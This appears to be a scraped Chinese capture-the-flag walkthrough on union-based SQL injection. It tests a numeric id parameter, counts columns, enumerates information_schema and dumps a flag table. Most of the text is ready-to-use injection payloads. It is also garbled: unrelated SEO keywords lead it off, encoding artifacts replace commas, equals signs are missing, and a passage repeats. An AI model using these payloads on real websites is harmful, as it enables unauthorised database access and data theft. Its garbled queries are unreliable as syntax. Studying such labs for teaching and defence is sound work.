做网站中怎么设置单张图片,全球电商平台排行榜,网易企业邮箱 登录,公司员工培训内容有哪些判断存在 sqli 注入
1 1 and 11 1 and 12 因为 11 为真#xff0c;12 为假#xff0c;且 11 与 1 显示的数据一样#xff0c;那么就存在 sqli 注入
查询该数据表的字段数量
一、
2 3 1,2成功带出数据#xff0c;3没有数据#xff0c;所以有两个字段 二、
1 order by …判断存在 sqli 注入
1 1 and 11 1 and 12 因为 11 为真12 为假且 11 与 1 显示的数据一样那么就存在 sqli 注入
查询该数据表的字段数量
一、
2 3 1,2成功带出数据3没有数据所以有两个字段 二、
1 order by 2 1 order by 3 1 order by 2 与 1 显示的一样1 order by 3 没有数据,所以字段数为 2
修改参数 ID 值
1 union select 1,2 由于 1 union select 1,2 只返回第一条结果union select 的结果没有输出所以需要修改参数 id
值可以 -1 ,0 随便哪个都可以 520 union select 1,2 520 union select 1,version() 520 union select 1,database() #查询当前数据库信息 查询所有的数据库库名schemata 表 储存用户创建的 所有 数据库的库名schema_name 数据库库名
520 union select 1,group_concat(schema_name)
from information_schema.schemata 查询 sqli 数据库 下的 数据表tables 表 储存用户创建的所有数据库的库名和表名table_name数据库的表名
520 union select 1,group_concat(table_name)
from information_schema.tables
where table_schemasqli 查询sqli 数据库下flag 表中的 字段名
columns 表 存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name
0 union select 1,group_concat(column_name)
from information_schema.columns
where table_schemasqli and table_nameflag 查询 sqli 数据库中.flag字段名下的 字段内容
520 union select 1,group_concat(flag)
from sqli.flag
